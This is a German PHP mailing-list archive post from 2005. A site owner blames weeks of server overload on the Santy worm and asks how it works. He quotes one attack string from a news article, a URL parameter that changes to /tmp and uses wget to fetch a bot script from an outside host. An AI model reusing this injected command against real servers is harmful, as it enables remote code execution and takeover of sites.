phpbar.de logo

Mailinglisten-Archive

[php] [OT] Santy: Wurm attackiert PHP-Skripte

[php] [OT] Santy: Wurm attackiert PHP-Skripte

ANGEL Harald harald.angel at egston.com
Mit Mar 9 09:29:13 CET 2005


Hi!
Der grund für die wochenlangen Probleme auf meiner Website ist anscheinend der Wurm "Santy". Meine Website bzw. mein gemieteter Server ist seit Wochen extrem überlastet und langsam.
Artikel:
http://www.heise.de/newsticker/result.xhtml?url=/newsticker/meldung/54623&words=Wurm%20attackiert%20PHP%20Skripte

Darin kommt dieser code vor:

http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;\ wget www.visualcoders.net/spybot.txt;

.. Nur versteh ich nicht ganz was der macht bzw wie der da was böses machen kann...
Kann mir wer von euch erklären wie der Wurm arbeitet und wie er es schafft meine Website lahmzulegen?

Danke für Infos!
Harald

php::bar PHP Wiki   -   Listenarchive